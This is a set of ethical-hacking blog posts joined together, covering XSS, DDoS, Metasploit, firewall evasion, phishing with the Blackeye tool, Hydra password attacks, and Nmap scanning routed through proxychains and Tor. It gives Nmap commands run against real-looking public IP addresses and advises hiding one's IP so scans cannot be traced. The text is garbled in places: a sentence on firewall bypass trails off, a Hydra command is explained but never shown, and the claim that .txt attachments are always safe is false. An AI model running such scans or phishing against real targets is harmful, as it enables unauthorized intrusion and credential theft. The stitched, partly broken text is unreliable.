Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into trusted and credible websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that enable XSS to succeed are quite widespread and occur anywhere a web application uses input from a user like a form within the output it generates without validating or encoding it.

An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script unknowingly because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page.

The malicious content sent to the web browser often takes the form of a segment of JavaScript, but may also include HTML, Flash, or any other type of code that the browser may execute. The variety of attacks based on XSS is almost limitless, but they commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site.

How to Determine If You Are Vulnerable

XSS flaws can be difficult to identify and remove from a web application. The best way to find flaws is to perform a security review of the code and search for all places where input from an HTTP request could possibly make its way into the HTML output. Note that a variety of different HTML tags can be used to transmit a malicious JavaScript. Nessus, Nikto, and some other available tools can help scan a website for these flaws, but can only scratch the surface. If one part of a website is vulnerable, there is a high likelihood that there are other problems as well.

Types of XSS Attacks

• Stored XSS Attacks
• Blind Cross-Site Scripting
• Reflected XSS Attacks

A DoS attack is an attempt by a hacker to flood a user’s or organization’s system. There are two main categories of DoS attacks which involve an attack sent to a single system to a single target. The other one is where many systems send attacks to a single target. The goal of DoS isn’t to gain unauthorized access to machines or data but to prevent legitimate users from using the servers. A DoS attack may do the following
– Flood a network with traffic, thereby preventing legitimate network traffic
– Disrupt connections between two machines, thereby preventing access to a service.
– Prevent a particular individual from accessing a service
– Disrupt service to a specific system or person

A DoS attack is usually a last resort attack because it is considered unsophisticated. This type of attack doesn’t give the hacker any information or benefits but instead annoys the target and interrupts their service. DDoS attacks are an advanced version of a DoS attacked in a much larger scale. DDoS attacks are coordinated and strategized to flood the victim target’s system.

DDoS Attacks are compromised of three parts because they are more complex. The first part is Master/Handler. Secondly is the Slave/Victim/Zombie. Lastly is the Victim/Primary Victim. The master is the attack launcher and is the mastermind behind the attack. A slave is a host that is compromised by and controlled by the monster to attack the victim’s system as well. The master computer which is behind the attack directs the compromised systems to attack the primary victims system. As you can tell this widescale attack takes a lot of coordination and is done in multiple phases.

The intrusion phase is when the hacker compromises weak systems in different networks around the world and installs DDoS tools on those compromised slave systems. In the DDoS attack phase, the slave systems are triggered to cause them to attack the primary victim.

Metasploit Framework is a Ruby based penetration testing platform that enables you to write, test, and execute exploit code. The Metasploit framework contains a whole toolkit that you can use to test vulnerabilities, enumerate networks, execute attacks, and evade detection.

One interface Metasploit Framework provides is the MSFconsole which is the most commonly used interface to work with the framework. The console lets you run commands and scan targets. Also exploit vulnerabilities with exploit modules and payloads.

Modules are the core components of the Metasploit Framework. A module is a piece of software that can perform a specific action, such as scanning or exploiting. Each task that you can perform with the Metasploit Framework is defined within a module.

There are specific types of modules in the framework which are used for many different purposes.

Exploits are a way of gaining access to a system through a security flaw and taking advantage of the vulnerability. Exploits normally came by the way of a programmed software, piece of code, or a script. They are delivered as a part of a kit which is a collection of exploits.

These exploits can vary in their methodology for instance some exploits allow you to get access to the network and get admin privileges. Other exploits allows you to trap websites with malware and malicious ads to get sensitive information from the website’s traffic. As you can imagine there are hundreds of exploits for many targets of attack. Luckily there is a program meant to identify the vulnerabilities that are well documented and disclosed. All of these vulnerabilities get a unique CVE code to identify the vulnerability usually involving the year it was discovered.

Blackhole 2.0 is one of the most popular toolkits for exploiting vulnerabilities and security holes in many software’s. Kits like this makes it easy for anyone to generate and distribute malware that has a high degree of success. Other methods include tools such as Nmap or Google Dorking to find security holes.

Microsoft is the most common target thanks to how widespread the use of it’s software is. The top exploited vulnerability on the list is CVE-2018-8174. Nicknamed Double Kill, it’s a remote code execution flaw residing in Windows VBScript which can be exploited through Internet Explorer.

A firewall is a security measure used to protect ports that are unused and open by filtering them to hosts with permissions. Some firewalls provide stateful packet inspection, which means they check addresses and ports and look inside the IP and TCP or UDP header to verify that it is an acceptable packet. Firewalls are meant for protection and detection. Most scans that aren’t stealthy will be picked up by firewalls and be alerted to the hosts and admins.

Usually standard firewalls are meant to detect Non-HTTP traffic to the website to stop legitimate traffic going through the firewall. However there are firewalls that function in the application layer of the OSI model. These are called Proxy Firewalls that take all of the legitimate traffic and filter the data correctly. These are integrated in most web servers that websites use and is not part of the internal network of the website. It is in a separate location outside the internal network which protects the network from outside connections.

One way to get through firewalls is through packet fragmentation. Firewalls have a limit of size to the datagrams that can be sent to the network (MTU). Fragmenting the packets is when the packets are divided and reassembled once they are through the firewall.

UDP and ICMP fragmentation attacks – These attacks involve the transmission of fraudulent UDP or ICMP packets that are larger than the network’s MTU, (usually ~1500 bytes). As these packets are fake, and are unable to be reassembled, the target server’s resources are quickly consumed, resulting in server unavailability

TCP fragmentation attacks (a.k.a. Teardrop) – Also known as Teardrop attacks, these assaults target TCP/IP reassembly mechanisms, preventing them from putting together fragmented data packets. As a result, the data packets overlap and quickly overwhelm the victim’s servers, causing them to fail.Teardrop attacks are a result of an OS vulnerability common in older versions of Windows, including 3.1, 95 and NT. While patches were thought to have put a stop to these attacks, a vulnerability resurfaced in Windows 7 and Windows Vista, making Teardrop attacks once again a viable attack vector.
The vulnerability was re-patched in the latest version of Windows, but operators should keep an eye out to ensure that it stays patched in all future versions

Other ways to bypass a firewall is

Social engineering is a way of using the human psychology against the individual and taking advantage of their trust. The main difference of this avenue of attack than all the others is that this relies on human communication rather than communication between devices. Social engineering attack methods can include

• Impersonation
• Reciprocation
• Influential Authority
• Scarcity
• Social Relationship
• Social Engineering Toolkit

Impersonation seems to be the most commonly used way of social engineering in which someone makes a fake social media account or email to persuade the target they are someone who they are not. If the victim actually falls for this trick then they would be susceptible to phishing attacks as previously mentioned. Fake links, emails, and fake offers can be paired with social engineering to gain the IP Address, Login Credentials, and even Banking Information.

Social Relationship is also something that can be used to gain trust of a victim and persuade them to reveal sensitive information without having to do any technical methods of hacking.

A social engineering tool that is used CUPP (Common User Passwords Profiler) that generates passwords based on the target’s personal, psychological, and social characteristics. Some information of the target is needed for this tool to work but when it is generated it can be a powerful password list to use with hydra or any dictionary attack tool.

Phishing is a cybercrime in which a target or targets are contacted by email, telephone or text message by someone posing as a legitimate institution to lure individuals into providing sensitive data such as personally identifiable information, banking and credit card details, and passwords.

The information is then used to access important accounts and can result in identity theft and financial loss. These are the attributes of a phishing website.

1. Too Good To Be True – Lucrative offers and eye-catching or attention-grabbing statements are designed to attract people’s attention immediately. For instance, many claim that you have won an iPhone, a lottery, or some other lavish prize. Just don’t click on any suspicious emails. Remember that if it seems to good to be true, it probably is!
2. Sense of Urgency – A favorite tactic amongst cybercriminals is to ask you to act fast because the super deals are only for a limited time. Some of them will even tell you that you have only a few minutes to respond. When you come across these kinds of emails, it’s best to just ignore them. Sometimes, they will tell you that your account will be suspended unless you update your personal details immediately. Most reliable organizations give ample time before they terminate an account and they never ask patrons to update personal details over the Internet. When in doubt, visit the source directly rather than clicking a link in an email.
3. Hyperlinks – A link may not be all it appears to be. Hovering over a link shows you the actual URL where you will be directed upon clicking on it. It could be completely different or it could be a popular website with a misspelling, for instance www.bankofarnerica.com – the ‘m’ is actually an ‘r’ and an ‘n’, so look carefully.
4. Attachments – If you see an attachment in an email you weren’t expecting or that doesn’t make sense, don’t open it! They often contain payloads like ransomware or other viruses. The only file type that is always safe to click on is a .txt file.
5. Unusual Sender – Whether it looks like it’s from someone you don’t know or someone you do know, if anything seems out of the ordinary, unexpected, out of character or just suspicious in general don’t click on it!

Black Eye Hacking Tool

There is actually a tool for phishing that can make this process very easy. Blackeye is a tool phrase as the ultimate phishing tool that can generate the phishing link for you very easily. This link paired up with Ngrok that exposes local servers behind NATs and firewalls to the public internet over secure tunnels that can be very useful.

Blackeye gives you a whole lot of options to pick from in terms of phishing websites. This includes Facebook, Snapchat, Twitter, etc. When someone clicks this link they are prompted to a very realistic version of the website and a login form. If a user submits their login credentials then the credentials will be fed back to your terminal along with their IP Address.

A phishing tool like this can be extremely powerful with social engineering skills which will be covered next post

Once enumeration is done the ethical hacker can look forward to trying to get the credentials of the admins. There are many ways to do this and get the password by dictionary attacks, phishing, sql injections, eavesdropping, malware and plenty more. Today we will focus on a dictionary attack using Hydra.

A dictionary attack is a form of brute force attack technique for getting through a authentication mechanism via thousands or millions of likely possibilities of usernames and password combinations. Additionally these combinations of passwords and usernames have most likely been extracted from previous data breaches so they have some legitimacy to them. The only way this method works though is because people use short or weak passwords. Nowadays your browser and your phone have provided features to generate safe passwords and store them to make sure

CEWL – is a ruby app which spiders a given URL to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper, Hydra, etc. Basically you can make your own personalized dictionaries from a given target’s website.

Hydra– is a parallelized network login cracker built in various operating systems like Kali Linux, Parrot and other major penetration testing environments. Hydra works by using different approaches to perform brute-force attacks in order to find the right username and password combination

Implementation- Once you have generated a list of passwords with CEWL or wherever source you choose from, you can start using Hydra. It is important to note a username needs to be provided also and is usually much easier to get than the password as it can be visible most of the times to outsiders and can also be the email associated to the username. These can all be found by the enumeration steps we covered previously.

the example.com is the web domain that you have to provide to hydra. Next is the -L flag that takes in the list of emails file or usernames file as the parameter. The -P flag takes in the parameter of the list of passwords file. The http-post-form is a way to specify how the username and passwords will be submitted via post method in this case. Next is specifying the route for where the post method will be sent to in this case is “/login.php” and we are adding information to the route by providing variables like email and password. This email and password variables are set equal to emails.txt and passwords.txt in that order respectively. Lastly Invalid password is the message we will get if all the combinations are incorrect.

If done correctly Hydra will perform a dictionary attack and attempt to login with all the combinations possible in the dictionaries.

Port Scanning can be done with many tools, today we will be looking at NMAP (Network Mapper) which is a free and open source tool for vulnerability scanning and network discovery. This is commonly used to identify what devices are running on a system and discovering hosts that are available. Along with host information we can also see what services they offer. We can also find open ports and discover security risks. NMAP also offers ping scans and scans to detect the operating system. It has been evolving over the years.

NMAP works by sending packets that make communication via transport layer protocols like TCP, UDP, SCTP, and ICMP. These protocols serve different purposes and are used for different system ports. NMAP also uses banner grabbing which is a technique to gain information about a computer system on a network and the services running on the ports. However some systems may provide filtering and closing of their ports to stay protected. Additionally open ports mostly have firewalls protecting them setup by their administrator. Additionally filtering is the process of filtering the packets sent to the port denying the NMAP probes from ever reaching their destination.

TCP Message Types – These are the messages you will receive when monitoring a TCP connection, also known as a three way handshake.

Examples of Port Scanning with Nmap

Ping Scan

$ proxychain nmap -sn 40.90.170.115/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-14 13:34 EDT
Nmap done: 256 IP addresses (33 hosts up) scanned in 7.30 seconds

Port Scan                                                       

$ proxychain nmap 40.90.170.141 -p1-65535
Not shown: 65534 filtered ports
PORT    STATE SERVICE
443/tcp open  https

Services Scan

$ proxychain nmap -vv -dd 40.90.170.141

Proxy Chains and TOR

One key thing to know before performing port scans is to stay anonymous and mask your IP Address. This is because when doing a port scan most systems have firewalls that detect your scans and can easily find your information. The solution to this is a proxy which is a intermediary machine whose IP address will be detected rather than your own machine. By connecting to the internet through proxies your connection is more private and anonymous.

TOR is a free and open source software for anonymous communication by directing internet traffic through a worldwide network in order to conceal a user’s location. Without TOR your computer makes a direct TCP connection with the websites server you are browsing and from the web server your IP address can easily be detected. However with TOR the service sends your data through multiple nodes and never makes direct access with the web server. The exit node would finally be responsible for contacting with the webserver and it would be very tricky to tracing your IP Address.

Setup and Installation

First check if proxychains is already installed by running ($sudo apt install proxychains). If this says 0 packages installed then your already have it in your computer. Then we will have to navigate to the directory with the config file of proxychains. This can be found in this directory (/etc/proxychains.conf). You can also use the locate command to find the config file however if proxychains is installed the config file has to be somewhere in your system.

Next we will open the proxychains.conf file with VIM or Nano. Whichever you prefer. ($sudo vim proxychains.conf). Then we will press i to go into insert mode and change some things inside to config file. First we will uncomment dynamic chain (remove #) and then scroll down to the proxy list section at the bottom. We will add this code to the proxy list. (socks4 127.0.0.1 9050) and (socks5 127.0.0.1 9050). After that we will we press escape and do (:wq) to write/save and quit the file.

Next check if you have tor installed on your computer by the same process above. ($sudo apt install tor). Once installed on your computer you can run the tor service via this command ($service tor start) and check if the status is active by ($service tor status). Then press ctrl-z to exit the prompt but keep the service running. Ctrl-c would exit the prompt too but terminate the service. Finally run ($proxychains firefox google.com) and check your IP Address and see if your real IP is masked. If it is then you are successfully using proxychains!